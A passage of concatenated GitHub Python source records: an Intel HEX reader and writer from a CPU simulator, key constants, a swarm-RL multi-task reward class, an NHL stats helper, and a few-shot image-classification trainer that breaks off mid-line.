a single line.\n If positive, must be large enough to accomodate\n a single hexpair + separator.\n\n separator:\n The separator to insert between each hex pair.\n \"\"\"\n binstr = _datastore2string(self.data, padbyte, padtosize)\n hexpair_str = separator.join(string2hexpairs(binstr)).upper()\n\n if linelength > 0:\n # length of a single unit: a hexpair (two chars) with\n # a separator\n #\n unit_len = 2 + len(separator)\n\n if linelength < unit_len:\n raise ArgumentError('linelength too short')\n\n # adjust the linelength to contain an integral amount\n # of units\n #\n linelength -= linelength % unit_len\n\n lines = split_subsequences(hexpair_str, 
linelength)\n hexpair_str = '\\n'.join(lines) + '\\n'\n\n if filename:\n file = open(filename, 'w')\n file.write(hexpair_str)\n file.close()\n else:\n return hexpair_str\n\n\n_64K = 0x10000\n\n\nclass DataFormatterIntelHex(object):\n def __init__(self, data=None):\n self.data = data or BinaryAppDataStore()\n\n def read(self, str=None, filename=None, addr=0):\n \"\"\" Works similarly to read() in DataFormatterBinary.\n\n An Intel Hex file may specify its load address. In\n such a case, the addr argument is ignored.\n\n Can raise InputFileError on errors in the input file.\n \"\"\"\n if str is None:\n if filename is None:\n raise ArgumentError('Please supply a string or a filename')\n\n str = open(filename, 'r').read()\n\n # At any stage in the parsing of an Intel Hex file,\n # there's an address offset that have been computed in\n # an earlier line. Such offsets can either be linear or\n # segment. Initially, the offset is in addr, and we\n # assume the offset is linear.\n #\n addr_offset = addr\n is_linear_offset = True\n\n MAX_64K = 0xffff\n MAX_4G = 0xffffffff\n\n for linenum, line in enumerate(str.splitlines()):\n def line_error(msg):\n raise InputFileError('error in line %s: %s' % (linenum + 1, msg))\n\n line = line.strip()\n if not line: continue\n\n try:\n type, record_offset, data = self._parse_line(line)\n except self._LineError:\n err = sys.exc_info()[1]\n line_error(err.message)\n\n # The algorithm: each line will be added to the data\n # store as a separate record, relying on record\n # merging to compact the data as much as possible.\n #\n if type == 'Data':\n load_addr = 0\n\n if is_linear_offset:\n load_addr = addr_offset + record_offset\n\n # (LBA + DRLO + DRI) MOD 4G\n #\n # Records that extend beyond the 4G boundary\n # must be cut in two, and wrapped around to\n # LBA (addr_offset)\n #\n if load_addr + len(data) > MAX_4G + 1:\n # compute the length of data that will fit\n # until MAX_4G\n #\n fit_len = MAX_4G + 1 - load_addr\n\n # Place the data that fits in the end\n #\n self.data.add_record( load_addr,\n data[0:fit_len],\n merge=True)\n\n # And whatever didn't fit at addr_offset\n #\n self.data.add_record( addr_offset,\n data[fit_len:],\n merge=True)\n else:\n # the record fits, so just add it\n #\n self.data.add_record( load_addr, data,\n merge=True)\n else:\n # SBA + ([DRLO + DRI] MOD 64K)\n # data is wrapped around 64K boundaries\n #\n if record_offset + len(data) > MAX_64K + 1:\n fit_len = MAX_64K + 1 - record_offset\n self.data.add_record( addr_offset + record_offset,\n data[0:fit_len],\n merge=True)\n self.data.add_record( addr_offset,\n data[fit_len:],\n merge=True)\n else:\n self.data.add_record( addr_offset + record_offset, data,\n merge=True)\n\n elif type == 'EndFile':\n return self.data\n\n elif type in ('LinearOffset', 'SegmentOffset'):\n if len(data) != 2:\n line_error('expecting a 2-byte data field for this record type, got %s' % len(data))\n field_val = unpack('>H', data)[0]\n\n if type == 'SegmentOffset':\n is_linear_offset = False\n addr_offset = field_val << 4\n else:\n is_linear_offset = True\n addr_offset = field_val << 16\n\n elif type == 'LinearStartAddr':\n if len(data) != 4:\n line_error('expecting a 4-byte data field for this record type, got %s' % len(data))\n self.data.start_address = unpack('>L', data)[0]\n\n elif type == 'SegmentStartAddr':\n if len(data) != 4:\n line_error('expecting a 4-byte data field for this record type, got %s' % len(data))\n\n (cs, ip) = unpack('>HH', data)\n self.data.start_address = (cs << 4) + ip\n else:\n assert 
0, 'Unexpected type %s' % type\n\n return self.data\n\n def write( self,\n filename=None,\n bytes_per_data_line=32,\n write_start_address=False,\n use_segment_addressing=False):\n \"\"\" Writes the internal store in Intel HEX format.\n\n If a filename is provided, the data is written to the\n named file. Otherwise, the data is returned as a\n string.\n\n Note that files output in Intel HEX require no\n padding, since records will be split to begin at\n different addresses.\n\n bytes_per_data_line:\n The maximal amount of bytes to output in one line\n of data records. Although the format allows 256,\n it is customary to print out only 32 (probably\n because it's a round (in base 16) number that\n makes the output fit in a 80-char line).\n\n write_start_address:\n If True, the start address of the data store will\n be written to the output as a separate record\n (type 05 or 03)\n\n use_segment_addressing:\n If True, the 16-bit segment addressing will be\n used for output. Note that in this case the size\n of the addressable memory is 1 MB.\n \"\"\"\n if bytes_per_data_line > 256:\n raise ArgumentError('bytes_per_data_line must be <= 256')\n\n # How this works:\n #\n # First some nomenclature:\n # <<\n # In the jargon of pybinaryappdata, a data store\n # (BinaryAppData) consists of 'records'.\n # Unfortunately, this collides with the jargon of Intel\n # Hex files, where each line is a record of some type. To\n # avoid confusion, I'll refer to Intel HEX records as\n # 'lines'. 'Records' are BinaryAppData records.\n # >>\n #\n # Records are assumed to be non-consecutive (otherwise\n # they would be merged on creation). If they're\n # consecutive, the output will still be correct, though\n # it will contain a few unnecessary lines.\n #\n # For each record, an address offset line is specified,\n # followed by lines listing the record's data. If the\n # record is larger than 64K (the maximal offset allowable\n # in data lines), it is split to several blocks (which\n # follow one another). For example, if the data store\n # consists of a single 100K record at address 0, it is\n # split to two - the first is given an offset 0 and has\n # 64K data items, and the second is given an offset 64K\n # and contains 36K data items.\n #\n # At the end of the file, the start address and\n # end-of-file lines are written.\n #\n output = []\n\n for rec_start, rec_data in self.data.records():\n rec_end = rec_start + len(rec_data)\n\n if (use_segment_addressing and rec_end > 0xFFFFF or\n rec_end > 0xFFFFFFFF):\n raise InputRecordError(\"record at %s-%s won't fit in memory\" % (rec_start, rec_end))\n\n # The following few lines compute the blocks to which\n # this record has to be split. 
The maximal size of\n # a block is 64K\n #\n blocks_64K = [rec_start]\n i = rec_start + _64K - (rec_start % _64K)\n\n while i < rec_end:\n blocks_64K.append(i)\n i += _64K\n\n data_ptr = 0\n\n #~ print \"Rec:\", rec_start, rec_end, '> blocks:', blocks_64K\n\n # Now, for each block, write an address offset\n # line, and compute the amount of data to include in\n # the block.\n # Then, generate the data lines for the block.\n #\n for i, block_start in enumerate(blocks_64K):\n offset_64K = (block_start - block_start % _64K) / _64K\n\n if use_segment_addressing:\n assert offset_64K < 16\n usba = offset_64K << 12\n output.append(self._make_segment_address_line(usba))\n else:\n ulba = offset_64K\n output.append(self._make_linear_address_line(ulba))\n\n # Block length:\n # All blocks are size _64K, except maybe the first\n # and the last.\n # The first takes up the length needed to complete\n # its offset to the first 64K boundary.\n # The last is computed as follows:\n # The total data length is taken, and the start\n # of the block is subtracted. This still doesn't\n # give the final answer, becase the data began\n # at an offset, which is reflected in the start\n # of the first block.\n #\n if i == 0:\n block_len = _64K - block_start % _64K\n elif i == len(blocks_64K) - 1:\n block_len = len(rec_data) - block_start + blocks_64K[0]\n else:\n block_len = _64K\n\n #~ print ' block:', block_start, block_len, ulba\n\n output += self._block_data_lines(\n block_start % _64K,\n rec_data[data_ptr : data_ptr + block_len],\n bytes_per_data_line)\n\n data_ptr += block_len\n\n if write_start_address:\n if use_segment_addressing:\n output.append(self._make_segment_start_address_line())\n else:\n output.append(self._make_linear_start_address_line())\n\n output.append(self._make_endfile_line())\n str = '\\n'.join(output) + '\\n'\n\n if filename:\n file = open(filename, 'w')\n file.write(str)\n file.close()\n else:\n return str\n\n def _block_data_lines(self, offset, data, bytes_per_line):\n # Splits a block of data that begins at some offset into\n # Intel HEX record lines, and returns the list of lines.\n #\n lines = []\n data_ptr = 0\n #~ print \"bdl:\", offset, len(data)\n\n # Advance bytes_per_line at at time.\n # offset: the load offset field of the line\n # data_ptr: pointer into the data from which the next\n # line will be taken\n #\n while data_ptr < len(data):\n if data_ptr + bytes_per_line > len(data):\n num_bytes_in_line = len(data) - data_ptr\n else:\n num_bytes_in_line = bytes_per_line\n\n lines.append(self._make_data_line(\n offset,\n data[data_ptr:data_ptr + num_bytes_in_line]))\n\n offset += num_bytes_in_line\n data_ptr += num_bytes_in_line\n\n return lines\n\n def _make_checksum(self, line):\n chksum = 0\n for c in line:\n chksum = (chksum + ord(c)) % 256\n return chr((256 - chksum) % 256)\n\n def _format_line(self, data):\n \"\"\" Given the data for a line, computes its checksum,\n prepends ':' and hexlifies all the data bytes to\n produce a valid line of Intel HEX file.\n \"\"\"\n data_with_checksum = data + self._make_checksum(data)\n return (':' + hexlify(data_with_checksum).upper())\n\n def _make_linear_address_line(self, ulba):\n line = '\\x02\\x00\\x00\\x04' + pack('>H', ulba)\n return self._format_line(line)\n\n def _make_segment_address_line(self, usba):\n line = '\\x02\\x00\\x00\\x02' + pack('>H', usba)\n return self._format_line(line)\n\n def _make_data_line(self, offset, data):\n line = chr(len(data)) + pack('>H', offset) + '\\x00' + data\n return self._format_line(line)\n\n def 
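    # Hedged worked example of the checksum rule implemented by
    # _make_checksum()/_format_line() above and verified in _parse_line():
    # the checksum byte makes the sum of all record bytes 0 modulo 256.
    # For the record ':0300300002337A1E'
    #     0x03 + 0x00 + 0x30 + 0x00 + 0x02 + 0x33 + 0x7A = 0xE2
    #     checksum = (0x100 - 0xE2) & 0xFF = 0x1E
    # (the example record itself is illustrative, not taken from this project)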
_make_segment_start_address_line(self):\n cs = (self.data.start_address / _64K) << 12\n ip = (self.data.start_address % _64K)\n line = '\\x04\\x00\\x00\\x03' + pack('>HH', cs, ip)\n return self._format_line(line)\n\n def _make_linear_start_address_line(self):\n line = '\\x04\\x00\\x00\\x05' + pack('>L', self.data.start_address)\n return self._format_line(line)\n\n def _make_endfile_line(self):\n return ':00000001FF'\n\n\n ######################-- PRIVATE --######################\n\n class _LineError(Exception): pass\n\n def _parse_line(self, line):\n \"\"\" Parses a line from an Intel Hex file. The line is as\n read from the file.\n Recognizes the line type, makes sure it's formatted\n correctly, and checks the checksum.\n\n If the line is valid, returns the tuple:\n type, offset, data\n\n type: a _LineType value\n offset: value of the offset field (integer)\n data: a binary string with the line's data\n\n If the line is invalid, throws _LineError with an\n explanatory message.\n \"\"\"\n # the absolute minimal length of a valid line is 11\n # (1 for ':', 2 for record length, 4 for offset, 2 for\n # type, 0 for data and 2 for checksum)\n #\n if len(line) < 11:\n raise self._LineError('line too short')\n\n if line[0] != \":\":\n raise self._LineError(\"line does not begin with ':'\")\n\n try:\n length = int(line[1:3], 16)\n offset = int(line[3:7], 16)\n type = int(line[7:9], 16)\n checksum = int(line[-2:], 16)\n except (TypeError, ValueError):\n err = sys.exc_info()[1]\n raise self._LineError(err.message)\n\n try:\n data = unhexlify(line[9:-2])\n except TypeError:\n err = sys.exc_info()[1]\n raise self._LineError('bad data field: %s' % err.message)\n\n if len(data) != length:\n raise self._LineError('data field length (%s) not as specified (%s)' % (\n len(data), length))\n\n # validate checksum\n checksum_test = (length + offset % 256 + offset // 256 + type + checksum) % 256\n for byte in data:\n checksum_test = (checksum_test + ord(byte)) % 256\n\n if checksum_test != 0:\n expected = (checksum - checksum_test) % 256\n raise self._LineError('checksum test fails: expected %X' % expected)\n\n rectypes = {\n 0: 'Data',\n 1: 'EndFile',\n 2: 'SegmentOffset',\n 3: 'SegmentStartAddr',\n 4: 'LinearOffset',\n 5: 'LinearStartAddr'}\n\n if not rectypes.has_key(type):\n raise self._LineError('unknown record type: %s' % line[7:9])\n\n return rectypes[type], offset, data\n\n\ndef _datastore2string(data, padbyte=None, padtosize=None):\n \"\"\" A helper function for packing the whole data store into\n a string.\n\n See DataFormatterBinary.write() for the explanation of\n parameters.\n \"\"\"\n str = ''\n\n if data.num_records() == 0:\n return str\n\n # If the first record doesn't begin at 0, maybe we should\n # pad the data from 0\n #\n first_record_start = data.record(0)[0]\n if first_record_start != 0 and padbyte:\n str += padbyte * first_record_start\n\n # Add all the records to the string. 
First pad them, if\n # necessary.\n #\n # prev_record_end is initialized to first_record_start - 1\n # to cleanly handle the first record without extra checks.\n #\n prev_record_end = first_record_start - 1\n for rec_start, rec_data in data.records():\n if prev_record_end + 1 != rec_start and padbyte:\n str += padbyte * (rec_start - prev_record_end - 1)\n\n str += rec_data\n prev_record_end = rec_start + len(rec_data) - 1\n\n # Pad until padtosize if requested\n #\n if padbyte and padtosize and padtosize > prev_record_end + 1:\n str += padbyte * (padtosize - prev_record_end - 1)\n\n return str\n\n\nclass _DataRecords(object):\n \"\"\" Implements a collection of 'records'. Each record holds\n a consecutive segment of data.\n\n Serves as the low-level implementation of the high-level\n interface exposed in BinaryAppDataStore.\n \"\"\"\n def clear(self):\n self.d = []\n self.len = 0\n\n def __init__(self):\n self.clear()\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, addr):\n \"\"\" Access to the byte at address 'addr'\n \"\"\"\n (recnum, offset) = self._find_address(addr)\n return self.d[recnum].data[offset]\n\n def record(self, i):\n \"\"\" The i-th record (start, data) tuple\n \"\"\"\n r = self.d[i]\n return (r.start, r.data)\n\n def num_records(self):\n \"\"\" Number of records\n \"\"\"\n return len(self.d)\n\n def records(self):\n \"\"\" An iterator of records\n \"\"\"\n for r in self.d:\n yield (r.start, r.data)\n\n def add_record(self, address, data, merge=False):\n def find_index(lo, hi):\n \"\"\" Finds the position to insert the record in, using\n binary search.\n Doesn't check record clashes.\n \"\"\"\n i = (hi + lo) // 2\n #~ print 'fi:', i\n\n if self.d[i].start > address:\n return 0 if i == 0 else find_index(lo, i)\n elif i == len(self.d) - 1:\n return i + 1\n elif self.d[i + 1].start > address:\n return i + 1\n else:\n return find_index(i, hi)\n\n def segments_intersect(s1, e1, s2, e2):\n \"\"\" Do the segments [s1:e1] and [s2:e2] intersect ?\n Note: the segment ranges are inclusive, and all\n end-points are natural. 
Also, eN >= sN always.\n \"\"\"\n return e1 >= s2 and e2 >= s1\n\n # If we're empty, no need to search\n #\n if len(self.d) == 0:\n self.d = [self._make_record_addr_data(address, data)]\n # Otherwise find the index to insert the record in\n #\n else:\n i = find_index(0, len(self.d))\n\n rec_start = address\n rec_end = address + len(data) - 1\n\n # Check that the new record doesn't clash with its\n # neighbors\n #\n if i > 0 and segments_intersect(\n rec_start, rec_end,\n self.d[i - 1].start, self.d[i - 1].end):\n msg = \"Added record clashes with existing record at %s:%s\" % (\n self.d[i - 1].start, self.d[i - 1].end)\n raise RecordClashError(msg)\n if i < len(self.d) and segments_intersect(\n rec_start, rec_end,\n self.d[i].start, self.d[i].end):\n msg = \"Added record clashes with existing record at %s:%s\" % (\n self.d[i].start, self.d[i].end)\n raise RecordClashError(msg)\n\n merged_left = False\n merged_right = False\n\n # If merging is requested, attempt to merge with\n # neighbor records\n #\n if merge:\n # to the left...\n if i > 0 and self.d[i - 1].end == rec_start - 1:\n self.d[i - 1].end = rec_end\n self.d[i - 1].data += data\n merged_left = True\n # to the right\n elif ( i < len(self.d) and\n rec_end == self.d[i].start - 1):\n self.d[i].start = rec_start\n self.d[i].data = data + self.d[i].data\n merged_right = True\n\n # and now, maybe we can merge'em all !\n if ( 0 < i < len(self.d) and\n self.d[i - 1].end == self.d[i].start - 1):\n self.d[i - 1].end = self.d[i].end\n self.d[i - 1].data += self.d[i].data\n del self.d[i]\n\n if not merge or not (merged_left or merged_right):\n # Insert the new record into its place\n #\n self.d.insert(i,\n self._Record(rec_start, rec_end, data))\n\n self.len += len(data)\n\n ######################-- PRIVATE --######################\n\n # Holds a consecutive 'record' of data. It has a start\n # address, an end address and the data string.\n # len(data) == end - start + 1\n #\n class _Record(object):\n def __init__(self, start, end, data):\n if end < start or len(data) != end - start + 1:\n msg = 'data len: %s, start: %s, end: %s' % (\n len(data), start, end)\n raise InvalidRecordError(msg)\n\n self.start = start\n self.end = end\n self.data = data\n\n def __repr__(self):\n return \"[%s:%s] '%s'\" % (self.start, self.end, self.data)\n\n def _make_record_addr_data(self, address, data):\n return self._Record(address, address + len(data) - 1, data)\n\n def _find_address(self, addr):\n \"\"\" Finds a data cell with the given address. 
Returns\n a pair (recnum, offset):\n recnum: record number\n offset: offset to the requested address\n The data can then be accessed as\n self.d[recnum].data[offset]\n\n If such an address doesn't exist in any record,\n returns None.\n \"\"\"\n\n # binary search between lo and hi, inclusive\n def search(lo, hi):\n if lo > hi:\n raise IndexError('No address %s in records' % addr)\n\n i = (hi + lo) // 2\n\n if self.d[i].start > addr:\n return search(lo, i - 1)\n else:\n if self.d[i].end >= addr:\n return (i, addr - self.d[i].start)\n else:\n return search(i + 1, hi)\n\n return search(0, len(self.d) - 1)\n\n\ndef split_subsequences(iterable, length=2, overlap=0,\n join_substr=True):\n \"\"\" Given an iterable, splits it to subsequences of the given\n length (possibly with overlapping), and returns an\n iterator of the subsequences.\n\n If join_substr is set to True and iterable is a string,\n the subsqeuences will be joined (with '') into substrings.\n \"\"\"\n isstring = isinstance(iterable, str) and join_substr\n it = iter(iterable)\n results = list(itertools.islice(it, length))\n while len(results) == length:\n yield ''.join(results) if isstring else results\n results = results[length - overlap:]\n results.extend(itertools.islice(it, length - overlap))\n if results:\n yield ''.join(results) if isstring else results\n\n\ndef string2hexpairs(str):\n \"\"\" Given a string denoting binary data, splits it to a list\n of 'hexpairs', such as ['A8', 'FF']\n \"\"\"\n return list(split_subsequences(binascii.hexlify(str), 2))\n","repo_name":"eliben/luz-cpu","sub_path":"luz_asm_sim/lib/commonlib/binaryappdata.py","file_name":"binaryappdata.py","file_ext":"py","file_size_in_byte":32429,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"54"} +{"seq_id":"36807785180","text":"\nUP = 'KEY_UP'\nDOWN = 'KEY_DOWN'\nLEFT = 'KEY_LEFT'\nRIGHT = 'KEY_RIGHT'\nBACKSPACE = ['KEY_BACKSPACE', '\\b', '\\x7f']\nDELETE = 'DC'\nESC = chr(27)\n\nENTER = ['KEY_ENTER', '\\n']\nVERTICAL_ARROWS = [UP, DOWN]\nHORIZONTAL_ARROWS = [LEFT, RIGHT]\nARROWS = VERTICAL_ARROWS + HORIZONTAL_ARROWS\n\nINPUT_IGNORE = ENTER + VERTICAL_ARROWS + [ESC]\n","repo_name":"eduardoHoefel/dear-tool","sub_path":"gui/objects/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8300867952","text":"\"\"\"\nClass for multi-tasking.\n\"\"\"\nfrom typing import List\n\nimport jax.numpy as np\n\nfrom swarmrl.models.interaction_model import Colloid\nfrom swarmrl.tasks.task import Task\n\n\nclass MultiTasking(Task):\n \"\"\"\n Class for handling multiple tasks.\n \"\"\"\n\n def __init__(self, particle_type: int = 0, tasks: List[Task] = []):\n \"\"\"\n Constructor for multi-tasking.\n \"\"\"\n super().__init__(particle_type)\n self.tasks = tasks\n\n def initialize(self, colloids: List[Colloid]):\n \"\"\"\n Initialize the observables as needed.\n\n Parameters\n ----------\n colloids : List[Colloid]\n List of colloids with which to initialize the observable.\n\n Returns\n -------\n Some of the observables passed to the constructor might need to be\n initialized with the positions of the colloids. 
This method does\n that.\n \"\"\"\n for item in self.tasks:\n item.initialize(colloids)\n\n def __call__(self, colloids: List[Colloid]) -> np.ndarray:\n \"\"\"\n Computes all observables and returns them in a concatenated list.\n\n Parameters\n ----------\n colloids : list of all colloids.\n\n Returns\n -------\n rewards : np.ndarray of shape (num_colloids, )\n Array of rewards for each colloid.\n \"\"\"\n species_indices = self.get_colloid_indices(colloids)\n rewards = np.zeros(len(species_indices))\n for task in self.tasks:\n ts = task(colloids)\n rewards += ts\n\n return rewards\n","repo_name":"SwarmRL/SwarmRL","sub_path":"swarmrl/tasks/multi_tasking.py","file_name":"multi_tasking.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"17101208268","text":"from playerreader import PlayerReader\n\nclass PlayerStats:\n def __init__(self, reader: PlayerReader):\n self.reader = reader\n\n def top_scorers_by_nationality(self, nationality: str):\n players = self.reader.get_players()\n return_list = []\n\n for player in players:\n if player.nationality == nationality:\n return_list.append(player)\n \n return_list.sort(reverse=True)\n return return_list","repo_name":"nikolaipaukkonen/palautusrepositorio","sub_path":"viikko3/nhl-reader/src/playerstats.py","file_name":"playerstats.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14804096286","text":"from tensorboardX import SummaryWriter\nimport time\nimport os\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, sampler\nimport torch.nn.functional as F\nfrom utils import *\nfrom model import Model\nfrom datasets import get_transform, get_dataset,dset_from_json\nimport torch.backends.cudnn as cudnn\n\nclass Trainer():\n def __init__(self, opt, dset=None):\n logdir = opt.logdir\n ###\n try:\n import submitit\n job_env = submitit.JobEnvironment()\n logdir = logdir.replace('%j', str(job_env.job_id))\n opt.logdir = logdir\n except:\n print('No job id found')\n ###\n if opt.ngpus > 1:\n opt.bSz = opt.bSz*opt.ngpus\n opt.n_workers = int(min(opt.n_workers*opt.ngpus, 20))\n self.opt = opt\n print(f'Training with opts: {opt}')\n \n self.writer = SummaryWriter(logdir)\n print(f'Log dir: {self.writer.log_dir}')\n self.writer.add_text('opts', str(opt), 0)\n \n # Fix seed\n if opt.seed: torch.manual_seed(opt.seed)\n \n # depending on the chosen architecture adapt training image size\n if '224' in opt.feat_arch:\n opt.iSz = 224\n print(f'Using iSz: {opt.iSz}')\n else:\n print(f'Continuing with iSz: {opt.iSz}')\n \n # construct train dataset or use provided one\n if dset is None:\n self.traindset = get_dataset(opt.dataset, classDset=True, iSz=opt.iSz)\n else:\n self.traindset = dset\n \n print(self.traindset)\n print(self.traindset.classes[0].samples[0])\n print('Train dataset class length histogram')\n print(np.histogram([len(c) for c in self.traindset.classes]))\n self.ttype = 'IN' if opt.benchmark == 'IN' else 'miniIN'\n self.traindset.transform = get_transform(self.ttype, phase='train', do_normalize=True, iSz=opt.iSz)\n print('Train transform: ', self.traindset.transform)\n # construct dataloader\n self.init_dataloader(self.traindset)\n\n # construct validation/test dataset\n self.get_val_test_sets()\n print('val dataset: ', self.valdset)\n print('test dataset: ', self.testdset)\n \n # verify image size\n assert opt.iSz in [224, 
84], f' Got iSz: {opt.iSz}'\n \n # construct model\n self.model = Model(feat_arch=opt.feat_arch, nClasses=len(self.traindset.classes))\n if opt.ngpus > 1:\n self.model = torch.nn.DataParallel(self.model, device_ids=range(opt.ngpus))\n print('Using ')\n self.model.cuda()\n print(self.model)\n \n if opt.steps is None:\n opt.steps = get_steps(len(self.traindset), bSz=opt.bSz)\n print(f'Using steps: {opt.steps}')\n opt.max_iter = opt.steps[-1]\n \n # setup optimizer and scheduler\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=opt.lr, momentum=opt.momentum, weight_decay=opt.wd, nesterov=opt.nesterov)\n self.scheduler = MultiStepWarmupLR(self.optimizer, milestones=opt.steps, gamma=opt.gamma, warmup_steps=opt.warmup_steps)\n \n self.iteration = 0\n \n self.ims = torch.FloatTensor().cuda()\n self.targets = torch.LongTensor().cuda()\n self.best_5shot = 0\n self.best_ckpt_file = os.path.join(self.writer.log_dir,'best_checkpoint.pth')\n \n cudnn.benchmark = True\n print(f'Dataset size: {len(self.traindset)}, bSz: {opt.bSz}, steps: {opt.steps}, len dataloader {len(self.trainloader)}')\n \n\n def train(self):\n if self.opt.train_type == 'CC':\n return self.train_CosineClassifier()\n else:\n raise NotImplementedError(f'Unknown training type {self.opt.train_type}')\n\n def train_CosineClassifier(self):\n print('Start training CC !')\n while self.iteration < self.opt.max_iter:\n startTime = time.time()\n for i, (ims, targets) in enumerate(self.trainloader):\n self.ims.resize_(ims.size()).copy_(ims)\n self.targets.resize_(targets.size()).copy_(targets)\n\n self.model.train()\n self.optimizer.zero_grad()\n \n outputs = self.model(self.ims)\n \n loss = F.cross_entropy(outputs, self.targets)\n loss.backward()\n \n self.optimizer.step()\n self.scheduler.step()\n lr = self.scheduler.get_lr()[0]\n\n if self.iteration % 50 == 0:\n print(f'Iteration {self.iteration}: loss {loss:.3f}')\n self.writer.add_scalar('Train_CC/lr', lr, self.iteration)\n self.writer.add_scalar('Train_CC/loss', loss, self.iteration)\n _, y_hat = outputs.max(1)\n acc_val = torch.eq(y_hat, self.targets.squeeze()).float().mean()\n self.writer.add_scalar('Train_CC/acc', acc_val, self.iteration)\n \n del loss, outputs # clean a bit\n \n if self.iteration %self.opt.eval_freq == 0:\n # eval and plot\n ret = self.eval_fewshot(self.valdset.sample_N_images(50000))# sample max validation images for a dataset\n self.writer.add_scalar('Val_CC/1-shot', ret[1][0], self.iteration)\n self.writer.add_scalar('Val_CC/5-shot', ret[5][0], self.iteration)\n # if best checkpoint save it\n if ret[5][0] > self.best_5shot:\n self.best_5shot = ret[5][0]\n state_dict = self.model.state_dict() if self.opt.ngpus == 1 else self.model.module.state_dict()\n obj = {\n 'model':state_dict,\n 'iteration':self.iteration,\n 'best_5shot': self.best_5shot,\n 'opt':self.opt,\n }\n print(f'Saving best model at iteration: {self.iteration}, {self.best_5shot}')\n torch.save(obj, self.best_ckpt_file)\n torch.save(ret, os.path.join(self.writer.log_dir, 'bestval_result.pth'))\n \n self.iteration += 1\n if self.iteration >= self.opt.max_iter:\n break\n epochTime = time.time()- startTime\n eta = epochTime*(self.opt.max_iter-self.iteration)/len(self.trainloader)\n print(f'ETA: {eta/3600:0.0f}h {(eta%3600)/60:0.0f}min')\n # eval and save\n # load best checkpoint\n print('Loading best model')\n x = torch.load(self.best_ckpt_file)\n if self.opt.ngpus == 1:\n self.model.load_state_dict(x['model'])\n else:\n self.model.module.load_state_dict(x['model'])\n \n ret = 
self.eval_fewshot(self.testdset, nEpisodes=self.opt.nEpisodes, test=True) # TODO\n torch.save(ret, os.path.join(self.writer.log_dir,'result.pth'))\n if self.opt.delete_ckpt:\n os.remove(self.best_ckpt_file)\n self.writer.add_scalar('Test_CC/1-shot', ret[1][0], self.iteration)\n self.writer.add_scalar('Test_CC/5-shot', ret[5][0], self.iteration)\n return ret\n \n def eval_fewshot(self, whole_test_set, kshots=[1,5], seed_episode=True, usemean=True, nEpisodes=1000, test=False):\n torch.cuda.empty_cache()\n start_time = time.time()\n classifier_arch = 'cosine'\n # precompute features of the whole set\n self.model.eval()\n model = self.model if self.opt.ngpus == 1 else self.model.module\n \n # eval few-shot\n results = {}\n ret = {}\n for k in kshots:\n results[k] = []\n maxk = max(kshots)\n nNovel = self.nNovel; nTest = self.nTest; topk = self.topk\n \n set_json = self.opt.test_json if test else self.opt.val_json\n if set_json:\n if set_json == 'miniIN1k_nim100_seed0_closest':\n classDict = torch.load('data/test_benchmarks/miniIN1k_4_closest_inds_of_each.pth')\n print('Closest class benchmark')\n elif set_json == 'miniIN1k_nim100_seed0_farthest':\n classDict = torch.load('data/test_benchmarks/miniIN1k_4_farthest_inds_of_each.pth')\n print('Farthest class benchmark')\n elif set_json == 'miniIN1k_nim100_seed0':\n classDict = {}\n print('Random class benchmark')\n elif 'diverse' in set_json:\n print('Using most diverse classes')\n if set_json == 'miniIN1k_most_diverse':\n classInds = torch.load('data/test_benchmarks/100_high_diversity_inds.pth')\n elif set_json == 'miniIN1k_least_diverse':\n classInds = torch.load('data/test_benchmarks/100_low_diversity_inds.pth')\n whole_test_set = whole_test_set.sample_n_classes(class_inds=classInds)\n print('Sub-sampled dataset ', whole_test_set)\n print(f'Precomputing features of whole set with: {len(whole_test_set)} images, test: {str(test)}')\n testloader = DataLoader(whole_test_set, batch_size=self.opt.bSz, shuffle=False, num_workers=20)\n features, targets = compute_features(model.feat, testloader, verbose=False)\n print('Done. 
Got features of size: {}'.format(features.size()))\n\n for episode in range(nEpisodes):\n seed = episode if seed_episode else None\n g = get_generator(seed)\n N = len(whole_test_set)\n if set_json and 'miniIN1k_nim100_seed0' in set_json:\n if len(classDict):\n c0ind = torch.randperm(1000)[0].item()\n class_inds = torch.LongTensor([c0ind]+classDict[c0ind])\n else:\n class_inds = torch.randperm(1000)[:5]\n else:\n non_empty_class_inds = [i for i,c in enumerate(whole_test_set.classes) if len(c)]\n \n class_inds = torch.randperm(len(non_empty_class_inds), generator=g)[:nNovel]\n class_inds = torch.LongTensor(non_empty_class_inds)[class_inds]\n \n global_inds = []\n for class_ind in class_inds:\n class_size = len(whole_test_set.classes[class_ind])\n sampled_inds = (torch.randperm(class_size, generator=g)[:maxk+nTest]).tolist()\n global_inds.extend([whole_test_set.cum_len[class_ind] + ind for ind in sampled_inds])\n global_inds = torch.LongTensor(global_inds).view(nNovel, maxk+nTest)\n targets = torch.LongTensor(range(nNovel)).repeat(maxk+nTest,1).transpose(0,1)\n\n exemplar_inds = global_inds[:,:maxk].contiguous().view(-1)\n test_inds = global_inds[:,maxk:].contiguous().view(-1)\n\n trainfeatures_maxk, traintargets_maxk = features[exemplar_inds], targets[:,:maxk].contiguous().view(-1)\n testfeatures, testtargets = features[test_inds], targets[:,maxk:].contiguous().view(-1)\n\n for k in kshots:\n inds = torch.cat([torch.where(traintargets_maxk==i)[0][0:k] for i in range(nNovel)])\n trainfeatures = trainfeatures_maxk[inds]\n traintargets = traintargets_maxk[inds]\n\n if classifier_arch == 'cosine':\n testfeatures = testfeatures.cuda()\n trainfeatures = trainfeatures.cuda()\n traintargets = traintargets.cuda()\n\n # Cosine Similarity with average feature\n cls_score = model.fc(testfeatures, features_train=trainfeatures, labels_train=traintargets)\n\n # eval on val_noveldset by computing NN to features in train_noveldset\n accs = accuracy(cls_score.cpu(), torch.LongTensor(testtargets), topk=(topk,))\n else:\n x = F.normalize(testfeatures, p=2, dim=testfeatures.dim()-1)# len(val_noveldset)-->bSz,fSz\n y = F.normalize(trainfeatures, p=2, dim=trainfeatures.dim()-1)# 